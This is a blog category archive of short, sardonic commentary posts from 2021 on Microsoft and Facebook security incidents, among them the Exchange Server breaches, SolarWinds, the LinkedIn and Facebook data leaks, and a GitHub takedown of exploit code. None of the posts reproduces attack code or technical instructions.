Browse > Home / Archive by category 'Microsoft'

Facebook and Microsoft: Communing with the Spirit of Security

April 7, 2021

Two apparently unrelated actions by bad actors. Two paragons of user security. Two. Count ‘em.

The first incident is summarized in “Huge Facebook Leak That Contains Information about 500 Million People Came from Abuse of Contacts Tool, Company Says.” The main point is that flawed software and bad actors were responsible. But 500 million. Where is Alex Stamos when Facebook needs guru-grade security to zoom into a challenge?

The second incident is explained in “Half a Billion LinkedIn Users Have Scraped Data Sold Online.” Microsoft, the creator of the super useful Defender security system, owns LinkedIn. (How is that migration to Azure coming along?) Microsoft has been a very minor character in the great works of 2021. These are, of course, The Taming of SolarWinds and The Rape of Exchange Server.

Now what’s my point. I think when one adds 500 million and 500 million the result is a lot of people. Assume 25 percent overlap. Well, that’s still a lot of people’s information which has taken wing.

Indifference? Carelessness? Cluelessness? A lack of governance? I would suggest that a combination of charming personal characteristics makes those responsible individuals one can trust with sensitive information.

Yep, trust and credibility. Important.

Stephen E Arnold, April 7, 2021

Written by Stephen E. Arnold · Filed Under Facebook, Microsoft, News, Security | Comments Off on Facebook and Microsoft: Communing with the Spirit of Security 

MSFT Exchange Excitement: Another Jolt of Info

March 30, 2021

I read “Exchange Server Attacks: Microsoft Shares Intelligence on Post-Compromise Activities.” Interesting, weeks, maybe longer since what one of my analysts described as another digital Chernobyl, have passed without much substantive information.

This “real” news story reports:

Microsoft is raising an alarm over potential follow-on attacks targeting already compromised Exchange servers, especially if the attackers used web shell scripts to gain persistence on the server, or where the attacker stole credentials during earlier attacks.

Interesting. A massive attack which may have distributed malware, possibly as yet undetected, poses a risk. That’s good to know.

This statement attributed to Microsoft is intriguing as well:

In a new blog post, Microsoft reiterated its warning that “patching a system does not necessarily remove the access of the attacker”.

Does this mean that Microsoft’s remediation is not fixing the “problem”? What sorts of malware could be lurking? Microsoft provides some measured answers to this particular question in “Analyzing Attacks Taking Advantage of the Exchange Server Vulnerabilities”?

But the problem is that Microsoft’s foundational software build and deploy business process seems to be insecure.

Dribs and dabs of the consequences of a major security breach is PR and hand waving, not actions which I craved.

Stephen E Arnold, March 30, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Security | 1 Comment 

Exchange Servers: Not Out of the Dog House Yet

March 25, 2021

Here’s a chilling statement I spotted in “Microsoft Servers Being Hacked Faster Than Anyone Can Count”:

This free-for-all [Exchange Server] attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic “script kiddies… Because access is so easy, you can assume that majority of these environments have been breached.

The statement is attributed to Antti Laatikainen, senior security consultant at the cyber security firm F-Secure.

Is this accurate?

The ever fascinating digital publication Windows Central ran a story with a headline that offers a different point of view: “Microsoft Says 92% of Exchange Servers Have Been Patched or Mitigated.”

The discussion about these different views raises a number of questions:

  • Does Microsoft want to remediate its business processes to make its products and services more secure? (More security means more difficulties for certain government agencies who use security as a way to achieve their objectives.)
  • Can security professionals be trusted to identify security problems or issues? (The SolarWinds’ misstep went undetected for months, maybe as much as two years before information about the issue surfaced in a FireEye statement.)
  • Can continuous development and update processes deliver acceptable security? (The core business process may exponentially increase the attack surface with each fast cycle change and deployment.)

How secure are “patched” Exchange servers? A very good question indeed.

Stephen E Arnold, March 25, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Security | Comments Off on Exchange Servers: Not Out of the Dog House Yet 

High Tech Tension: Sparks Visible, Escalation Likely

March 25, 2021

I read Google’s “Our Ongoing Commitment to Supporting Journalism.” The write up is interesting because it seems to be a dig at a couple of other technology giants. The bone of contention is news, specifically, indexing and displaying it.

The write up begins with a remarkable statement:Google has always been committed to providing high-quality and relevant information, and to supporting the news publishers who help create it.
This is a sentence pregnant with baby Googzillas. Note the word “always.” I am not certain that Google is in the “always” business nor am I sure that the company had much commitment. As I recall, when Google News went live, it created some modest conversation. Then Google News was fenced out of the nuclear ad machinery. Over time, Google negotiated and kept on doing what feisty, mom and pop Silicon Valley companies do; namely, keep doing what they want and then ask for forgiveness.

Flash forward to Australia. That country wanted to get money in exchange for Australian news. Google made some growling noises, but in the end the company agreed to pay some money.
Facebook on the other hand resisted, turned off its service, and returned to the Australian negotiating table.

Where was Microsoft in this technical square dance?

Microsoft was a cheerleader for the forces of truth, justice, and the Microsoft way. This Google blog post strikes me as Google’s reminding Microsoft that Google wants to be the new Microsoft. Microsoft has not done itself any favors because the battle lines between these two giants is swathed in the cloud of business war.

Google has mobile devices. Microsoft has the enterprise. Google has the Chromebook. Microsoft has the Surface. And on it goes.

Now Microsoft is on the ropes: SolarWinds, the Exchange glitch, and wonky updates which have required the invention of KIR (an update to remove bad updates).
Microsoft may be a JEDI warrior with the feature-burdened Teams and the military’s go to software PowerPoint. Google knows that every bump and scrape slows the reflexes of the Redmond giant.

Both mom and pop outfits are looking after each firm’s self interests. Fancy words and big ideas are window dressing.

Stephen E Arnold, March 25, 2021

Written by Stephen E. Arnold · Filed Under Google, Microsoft, News, Security | Comments Off on High Tech Tension: Sparks Visible, Escalation Likely 

Watching Hoops: Watching Microsoft Defensive Scramble

March 24, 2021

Air ball. I read “Microsoft Defender Will Automatically Prevent Exchange Server Exploits.” Technical foul! The write up contains this statement:

The tech giant warns, however, that this is just an interim mitigation meant to protect customers while they’re in the midst of implementing the comprehensive security update for Exchange it released earlier this month. 

Over and back!

The Redmond Wizards have great cheerleaders, but the opponents own the auditorium. The clock is ticking.

The Wizards’ coach is yelling at the officials. Oh, another technical foul.

Quick. Print out the play.

Wait, Microsoft Windows 10 updates broke the printer.

Whistle. Another technical foul.

Stephen E Arnold, March 24, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Security | Comments Off on Watching Hoops: Watching Microsoft Defensive Scramble 

Microsoft: Your Computer, Your Data. That Is a Good One

March 23, 2021

The online news stream is chock full of information about Microsoft’s swing-for-the-fences PR push for Discord. If you are not familiar with the service, I am not going to explain this conduit for those far more youthful than I. Like GitHub, Discord is going to be an interesting property if the Redmond crowd does the deal. If we anticipate Discord becoming part of the Xbox and Teams family, the alleged censorship of software posted to GitHub will be a glimpse of the content challenges in Microsoft’s future.

The more interesting development is the “real” news story “Microsoft Edge Could Soon Share Browsing Data with Windows 10.” The idea is that a person’s computer and the authorized users of the computing device will become one big, happy data family.

The article states:

Called share browsing data with other Windows features, it is designed to share data from Edge, such as Favorites or visited sites, with other Windows components. Search is a prime target, and highlighted by Microsoft at the time of writing. Basically, what this means is that users who run searches using the built-in search feature may get Edge results as well.

And what does Microsoft get? Possibilities include:

  • Federated, fine grained user behavior data
  • Click stream data matched to content on the user’s personal computer
  • Real-time information flows
  • Opportunities to share data with certain entities.

What happens to the user’s computer if said user does not accept such integration? The options range from loss of access to certain data to pro-active interaction to alter the functioning of the user’s computing device.

Why is this such a good idea? Microsoft, like Amazon, Facebook, and Google realize that the days of the Wild West are coming to an end. There are new sheriffs with new ideas about right and wrong.

Thus, get what one can while the gittin’ is good as the old times used to say.

But “What about security and privacy?” you ask? One response is, “That’s a good one.” Why not try stand up?

Stephen E Arnold, March 23, 2021

Written by Stephen E. Arnold · Filed Under Business strategy, Microsoft, News, Privacy | Comments Off on Microsoft: Your Computer, Your Data. That Is a Good One 

Microsoft Security: An Ominous Signification

March 22, 2021

IT News published “White House Taskforce Meets over Microsoft Software Weaknesses.” The “real news” story included a statement which I placed in the predictive bucket. Here’s the prose which caught my attention:

The security holes in the widely used mail and calendaring software leave the door open to industrial-scale cyber espionage, allowing malicious actors to steal emails virtually at will from vulnerable servers or to move elsewhere in the network.

Microsoft is pretty good at issuing magic fixes; for example, “Microsoft Releases One-Click Patch for Exchange Vulnerability” reveals:

Microsoft has released a one-click patch, the Microsoft Exchange On-Premises Mitigation tool, to help customers apply new security updates in the face of the Exchange Server cyber attack.

This IT Pro article points out:

ESET research found that Microsoft Exchange servers had been targeted by “at least ten hacker groups” and that they had managed to install backdoors on more than 5,000 servers in over 115 countries.

In this context the phrase “industrial scale cyber espionage” is doubly chilling.

Now about that JEDI contract for the US Department of Defense?

Stephen E Arnold, March 22, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Security | Comments Off on Microsoft Security: An Ominous Signification 

Microsoft Exchange After Action Action: Adulting or Covering Up?

March 12, 2021

I read “Researcher Publishes Code to Exploit Microsoft Exchange Vulnerabilities on GitHub.” The allegedly accurate “real” news report states:

On Wednesday, independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers that combined two of those vulnerabilities. Essentially, he published code that could be used to hack Microsoft customers, exploiting a bug used by Chinese government hackers—on an open-source platform owned by Microsoft.

What happened?

Microsoft, took down the hacking tool.  “GitHub took down it,” the researcher told Motherboard in an email. “They just send [sic] me an email.” On Thursday, a GitHub spokesperson confirmed to Motherboard that the company removed the code due to the potential damage it could cause.

Interesting.

Two questions crossed my mind:

  1. Is Microsoft showing more management responsibility with regard to the data posted on GitHub? Editorial control is often useful, particularly when the outputting mechanism provides a wealth of information and code. Some of these items can be used to create issues. Microsoft purchased GitHub and may now be forced to take a more adult view of the service.
  2. Is Microsoft covering up the flaws in its core processes? After reading Microsoft’s explanations of the Solarwinds’ misstep, the injection of marketing spin and intriguing rhetoric about responsibility open the door to a bit of Home Depoting; that is, paint, wood panel, and bit of carpet make an an ageing condo look better.

Worth watching both the breaches which are concerning and the GitHub service which can cause some individuals’ brows to furrow.

Stephen E Arnold, March 12, 2021

Written by Stephen E. Arnold · Filed Under Business strategy, Microsoft, News, Open source, Security | Comments Off on Microsoft Exchange After Action Action: Adulting or Covering Up? 

Microsoft: Stunned by Its Own Insecure Petard?

March 12, 2021

I read “10 Key Microsoft Ignite Takeaways for CIOs.” Marketing fluff except for one wild and crazy statement. Here’s the passage I found amusing:

By midyear, enterprises will also be able to control in which datacenter Microsoft stores documents shared through Teams, group by group or even for individual users, making it more useful in some regulated industries or where there are concerns about the security of data. These controls will mirror those available for Exchange and SharePoint. There will also be an option to make end-to-end-encrypted one-to-one voice or video calls, that CIOs can enable on a per-employee basis, and to limit meeting attendance only to invited participants. A future update could see the addition of end-to-end encrypted meetings, too. For companies that are centralizing their investment in such collaboration, McQuire said, “Security is arguably the number one selection criterion.”

Assume this number one selection criterion is on the money. What’s the Microsoft security posture with SolarWinds and the Exchange breaches?

That petard packs quite a wallop, and it is not from marketing hoohah. There’s nothing like a marketing oriented conference to blow smoke to obfuscate the incredible security issues Microsoft has created. But conferences and marketing talk are easier than remediating the security problems.

Stephen E Arnold, March 12, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Security | Comments Off on Microsoft: Stunned by Its Own Insecure Petard? 

LinkedIn: Social Media Excitement from the Softies

March 10, 2021

Microsoft is reportedly embracing the gig work mentality via LinkedIn, which it purchased in 2016. What could go wrong? Social Barrel tells us, “LinkedIn to Rival Fiverr and Upwork with Marketplaces.” The pandemic has greatly increased demand for independent workers, and it sounds like Microsoft refuses to cede the increased freelance-connection business to Upwork and Fiverr. Writer Ola Ric reveals:

“If true, the Microsoft-owned professional network service is all set to rival Fiverr and Upwork. Without a doubt, LinkedIn stands a big chance of rivaling Fiverr and Upwork considering its massive user base said to be around 740 million. The service is called Marketplaces according to The Information, and is already being developed. Apparently LinkedIn wants to explore a market, though small, but with potential for growth.”

Of course, many besides the self-employed are working remotely now, and many predict the trend will continue after the pandemic is in our rear view. This new reality means many new challenges for HR, and several employee management applications are being used to cope. Microsoft is also moving into this territory with its Viva platform, we learn from “The Arrival of ‘Enterprise Social’” at India’s BusinessWorld. Reporter Pradeep Kar elaborates:

“The opportunity is so big that Microsoft’s Chief Executive Satya Nadella went public, saying that the COVID-19 crisis would result in employee management applications that would outlast the pandemic. His company has quickly unveiled a new category of technology solutions called employee experience platforms (EXP) with Viva that ‘provides a single-entry point for employee engagement and internal communications.’ Microsoft calls Viva a gateway to the digital workplace. It includes human resource functions like payroll, tools to track employee performance, career development initiatives, etc. We know these employee engagement applications are not just good-to-have. They are critical. They allow organizations to keep employees connected, binding them to company goals and culture, improving productivity and loyalty.”

Microsoft’s Viva is not the only option, Par informs us. He lists Darwinbox, ADP Workforce Now, ZohoPeople, and PeopleStrong as just a few of the many alternatives.

We note Microsoft continues to explore its options as new things come along, a practice that has kept it in business since 1975. We wonder, though: Could this timing be a way to distract from the company’s part in the SolarWinds fiasco?

Cynthia Murrell, March 10, 2021

Written by Stephen E. Arnold · Filed Under Microsoft, News, Social Media | Comments Off on LinkedIn: Social Media Excitement from the Softies 

« Previous PageNext Page »

  • Archives

  • Recent Posts

  • Meta